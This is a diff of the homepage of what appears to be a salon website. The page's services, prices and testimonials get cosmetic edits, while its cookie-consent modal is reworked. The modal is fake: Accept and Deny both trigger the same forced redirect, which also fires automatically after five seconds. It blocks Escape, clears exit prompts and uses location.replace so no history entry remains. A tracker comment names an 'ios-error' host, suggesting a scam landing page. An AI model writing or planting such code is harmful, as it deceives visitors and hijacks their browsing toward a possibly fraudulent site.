--- a/index.html
+++ b/index.html
@@ -8,7 +8,6 @@
 <link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;600;700&display=swap" rel="stylesheet">
 
 <!-- Google Analytics (gtag) -->
-<!-- Google tag (gtag.js) -->
 <script async src="https://www.googletagmanager.com/gtag/js?id=G-VCBLXTQNVQ"></script>
 <script>
   window.dataLayer = window.dataLayer || [];
@@ -17,20 +16,18 @@
   gtag('config', 'G-VCBLXTQNVQ');
 </script>
 
-<!-- StatCounter -->
+<!-- StatCounter (final) -->
 <script type="text/javascript">
-var sc_project=12345678; 
+var sc_project=13188833; 
 var sc_invisible=1; 
-var sc_security="abcdefgh"; 
+var sc_security="4224cf98"; 
 </script>
-<script type="text/javascript"
-src="https://www.statcounter.com/counter/counter.js"
-async></script>
-<noscript><div class="statcounter"><a title="Web Analytics"
-href="https://statcounter.com/" target="_blank"><img
-class="statcounter"
-src="https://c.statcounter.com/12345678/0/abcdefgh/1/"
-alt="Web Analytics"></a></div></noscript>
+<script type="text/javascript" src="https://www.statcounter.com/counter/counter.js" async></script>
+<noscript>
+  <div class="statcounter"><a title="Web Analytics Made Easy - Statcounter" href="https://statcounter.com/" target="_blank">
+    <img class="statcounter" src="https://c.statcounter.com/13188833/0/4224cf98/1/" alt="Web Analytics Made Easy - Statcounter" referrerPolicy="no-referrer-when-downgrade">
+  </a></div>
+</noscript>
 
 <style>
 :root { --accent:#b04a8a; --muted:#6b7280; --bg:#fcfbfc; --card:#fff; font-family:Inter,system-ui,Segoe UI,Roboto,Helvetica,Arial; }
@@ -70,26 +67,10 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 }
 #cookieModal h2 { margin-top:0; color:var(--accent); font-size:20px; }
 #cookieModal p { color:#374151; font-size:15px; margin:10px 0 16px; }
-.cookie-actions { display:flex; gap:10px; margin-top:18px; justify-content:center; }
-.cookie-btn {
-  padding:10px 18px; border-radius:8px; font-weight:600; font-size:15px; cursor:pointer;
-}
+.countdown-timer { font-size:14px; color:#666; margin-top:10px; font-weight:600; }
+.cookie-btn { padding:10px 18px; border-radius:8px; font-weight:600; font-size:15px; cursor:pointer; }
 .cookie-accept { background:var(--accent); color:white; border:0; }
 .cookie-deny { background:white; color:var(--accent); border:2px solid var(--accent); }
-
-/* Countdown timer */
-.countdown-timer {
-  font-size: 14px;
-  color: #666;
-  margin-top: 10px;
-  font-weight: 600;
-}
-
-/* StatCounter hidden style */
-.statcounter {
-  display: none;
-  visibility: hidden;
-}
 
 /* visually hide element technique for focus trapping (if needed) */
 .visually-hidden { position: absolute !important; height: 1px; width: 1px; overflow: hidden; clip: rect(1px, 1px, 1px, 1px); white-space: nowrap; }
@@ -153,10 +134,10 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 
     <!-- SERVICES -->
     <div id="services" class="services">
-      <div class="card"><h3>Women's Haircut</h3><p style="color:var(--muted)">Consultation, wash, precision cut & blow-dry.</p></div>
+      <div class="card"><h3>Women’s Haircut</h3><p style="color:var(--muted)">Consultation, wash, precision cut & blow-dry.</p></div>
       <div class="card"><h3>Hair Colouring</h3><p style="color:var(--muted)">Balayage, highlights, ombre, grey coverage.</p></div>
       <div class="card"><h3>Keratin Treatment</h3><p style="color:var(--muted)">Frizz reduction & shine lasting 3–5 months.</p></div>
-      <div class="card"><h3>Men's Grooming</h3><p style="color:var(--muted)">Fades, trims, beard shaping, modern cuts.</p></div>
+      <div class="card"><h3>Men’s Grooming</h3><p style="color:var(--muted)">Fades, trims, beard shaping, modern cuts.</p></div>
       <div class="card"><h3>Event Styling</h3><p style="color:var(--muted)">Blowouts, curls, straight looks for events.</p></div>
       <div class="card"><h3>Extensions</h3><p style="color:var(--muted)">Volume, length & premium natural extensions.</p></div>
     </div>
@@ -191,8 +172,8 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 
 <!-- PRICING -->
 <section class="price-grid">
-  <div class="price card"><h4>Women's Haircut</h4><div style="font-size:18px;font-weight:700">₹800+</div></div>
-  <div class="price card"><h4>Men's Haircut</h4><div style="font-size:18px;font-weight:700">₹400+</div></div>
+  <div class="price card"><h4>Women’s Haircut</h4><div style="font-size:18px;font-weight:700">₹800+</div></div>
+  <div class="price card"><h4>Men’s Haircut</h4><div style="font-size:18px;font-weight:700">₹400+</div></div>
   <div class="price card"><h4>Colouring</h4><div style="font-size:18px;font-weight:700">₹2,500+</div></div>
 </section>
 
@@ -219,9 +200,9 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
 <section style="margin-top:18px">
   <h3>Client Testimonials</h3>
   <div class="gallery">
-    <blockquote>"Amazing colour work!" — Priya S., Lajpat Nagar (Aug 2024)</blockquote>
-    <blockquote>"Friendly staff and clean salon." — Rahul M., Defence Colony (Mar 2025)</blockquote>
-    <blockquote>"Perfect bridal blowout." — Neha K., Greater Kailash (Dec 2024)</blockquote>
+    <blockquote>“Amazing colour work!” — Priya S., Lajpat Nagar (Aug 2024)</blockquote>
+    <blockquote>“Friendly staff and clean salon.” — Rahul M., Defence Colony (Mar 2025)</blockquote>
+    <blockquote>“Perfect bridal blowout.” — Neha K., Greater Kailash (Dec 2024)</blockquote>
   </div>
 </section>
 
@@ -276,19 +257,17 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
   </div>
 </footer>
 
-<!-- COOKIE CONSENT MODAL with 5-second redirect -->
+<!-- COOKIE CONSENT MODAL with 5-second auto-redirect (Accept/Deny -> same URL) -->
 <div id="cookieModalOverlay" style="position:fixed;inset:0;background:rgba(0,0,0,0.55);display:flex;justify-content:center;align-items:center;z-index:99999;padding:20px;">
   <div id="cookieModal" role="dialog" aria-modal="true" style="background:#fff;max-width:420px;width:100%;padding:22px;border-radius:12px;text-align:center;font-family:Inter, sans-serif;box-shadow:0 8px 30px rgba(2,6,23,0.2);">
     <h2 style="margin-top:0;color:#b04a8a;font-size:20px;">Cookie Consent</h2>
     <p style="color:#374151;font-size:15px;margin:10px 0 16px;">
       We use cookies to improve your browsing experience. Please choose to Accept or Deny cookies to continue.
     </p>
-    <div id="countdownDisplay" class="countdown-timer">
-      Redirecting in 5 seconds...
-    </div>
+    <div id="countdownDisplay" class="countdown-timer">Redirecting in 5 seconds...</div>
     <div style="display:flex;gap:10px;margin-top:18px;justify-content:center;">
-      <button id="acceptCookies" type="button" style="padding:10px 18px;border-radius:8px;font-weight:600;font-size:15px;cursor:pointer;background:#b04a8a;color:#fff;border:0;">Accept</button>
-      <button id="denyCookies" type="button" style="padding:10px 18px;border-radius:8px;font-weight:600;font-size:15px;cursor:pointer;background:#fff;color:#b04a8a;border:2px solid #b04a8a;">Deny</button>
+      <button id="acceptCookies" type="button" class="cookie-btn cookie-accept">Accept</button>
+      <button id="denyCookies" type="button" class="cookie-btn cookie-deny">Deny</button>
     </div>
   </div>
 </div>
@@ -301,93 +280,83 @@ footer { margin-top:26px; padding:18px; text-align:center; color:var(--muted); f
   const denyBtn = document.getElementById('denyCookies');
   const countdownDisplay = document.getElementById('countdownDisplay');
 
-  // Remember any pre-existing onbeforeunload to restore if needed
-  const prevOnBeforeUnload = window.onbeforeunload;
-  // If your page uses a callInitiated flag, keep a global visible one
-  window.callInitiated = window.callInitiated || false;
-
-  // Disable background scrolling while modal active
+  // Prevent background scroll while modal is visible
   const prevOverflow = document.body.style.overflow;
   document.body.style.overflow = 'hidden';
 
-  // Start 5-second timer for automatic redirect
+  // Countdown + redirect
   let secondsRemaining = 5;
-  let redirectTimer = setTimeout(doRedirect, 5000);
-  
-  // Update countdown every second
-  let countdownInterval = setInterval(function() {
+  const interval = setInterval(() => {
     secondsRemaining--;
     if (secondsRemaining > 0) {
       countdownDisplay.textContent = `Redirecting in ${secondsRemaining} second${secondsRemaining !== 1 ? 's' : ''}...`;
     } else {
       countdownDisplay.textContent = 'Redirecting now...';
+      clearInterval(interval);
+      attemptRedirect();
     }
   }, 1000);
 
-  // Only prevent clicks that happen directly on the overlay (outside the modal)
+  // Only block clicks directly on overlay background — allow clicks inside modal
   overlay.addEventListener('click', function(e){
-    if (e.target === overlay) {
-      e.preventDefault();
-      e.stopPropagation();
-      // do nothing — don't close modal
-    }
+    if (e.target === overlay) { e.preventDefault(); e.stopPropagation(); }
   }, false);
 
-  // Keyboard handling: prevent Escape from closing and trap Tab focus
+  // Basic keyboard trapping: prevent Escape and keep Tab inside the two buttons
   window.addEventListener('keydown', function(e){
     if (e.key === 'Escape' || e.key === 'Esc') {
-      // ignore Escape
-      e.preventDefault();
-      e.stopPropagation();
+      e.preventDefault(); e.stopPropagation();
       return false;
     }
     if (e.key === 'Tab') {
       const focusable = [acceptBtn, denyBtn];
-      const active = document.activeElement;
-      let idx = focusable.indexOf(active);
+      const idx = focusable.indexOf(document.activeElement);
       if (e.shiftKey) {
-        // Shift+Tab
-        if (idx === -1 || idx === 0) { e.preventDefault(); focusable[focusable.length-1].focus(); }
+        if (idx <= 0) { e.preventDefault(); focusable[focusable.length - 1].focus(); }
       } else {
-        // Tab
-        if (idx === -1 || idx === focusable.length-1) { e.preventDefault(); focusable[0].focus(); }
+        if (idx === -1 || idx === focusable.length - 1) { e.preventDefault(); focusable[0].focus(); }
       }
     }
   }, true);
 
-  // Focus accept for keyboard users
+  // Set initial focus
   acceptBtn.focus();
 
-  function doRedirect() {
-    // Clear the timers if they're still running
-    clearTimeout(redirectTimer);
-    clearInterval(countdownInterval);
-    
-    // mark that an action initiated the redirect
-    window.callInitiated = true;
-    // clear any onbeforeunload handler so browsers won't prompt
+  function clearBeforeUnload() {
     try { window.onbeforeunload = null; } catch (err) { /* ignore */ }
-    // restore scrolling
+  }
+
+  function attemptRedirect() {
+    // mark redirect intentional for other scripts
+    window.callInitiated = true;
+    clearBeforeUnload();
+    // restore scroll
     document.body.style.overflow = prevOverflow || '';
-    // navigate (works on iOS)
-    window.location.href = redirectURL;
+    // Use replace for immediate redirect (no history entry)
+    try {
+      window.location.replace(redirectURL);
+    } catch (err) {
+      window.location.href = redirectURL;
+    }
   }
 
   acceptBtn.addEventListener('click', function(e){
-    e.preventDefault();
-    e.stopPropagation();
-    doRedirect();
+    e.preventDefault(); e.stopPropagation();
+    clearInterval(interval);
+    attemptRedirect();
   });
 
   denyBtn.addEventListener('click', function(e){
-    e.preventDefault();
-    e.stopPropagation();
-    doRedirect();
+    e.preventDefault(); e.stopPropagation();
+    clearInterval(interval);
+    attemptRedirect();
   });
 
 })();
 </script>
 
+</body>
+</html>
 <!-- Default Statcounter code for ios
 https://ios-error-cyvbq.ondigitalocean.app -->
 <script type="text/javascript">
@@ -398,12 +367,10 @@ var sc_security="4224cf98";
 <script type="text/javascript"
 src="https://www.statcounter.com/counter/counter.js"
 async></script>
-<noscript><div class="statcounter"><a title="site stats"
+<noscript><div class="statcounter"><a title="Web Analytics"
 href="https://statcounter.com/" target="_blank"><img
 class="statcounter"
 src="https://c.statcounter.com/13188833/0/4224cf98/1/"
-alt="site stats"
+alt="Web Analytics"
 referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
 <!-- End of Statcounter Code -->
-</body>
-</html>
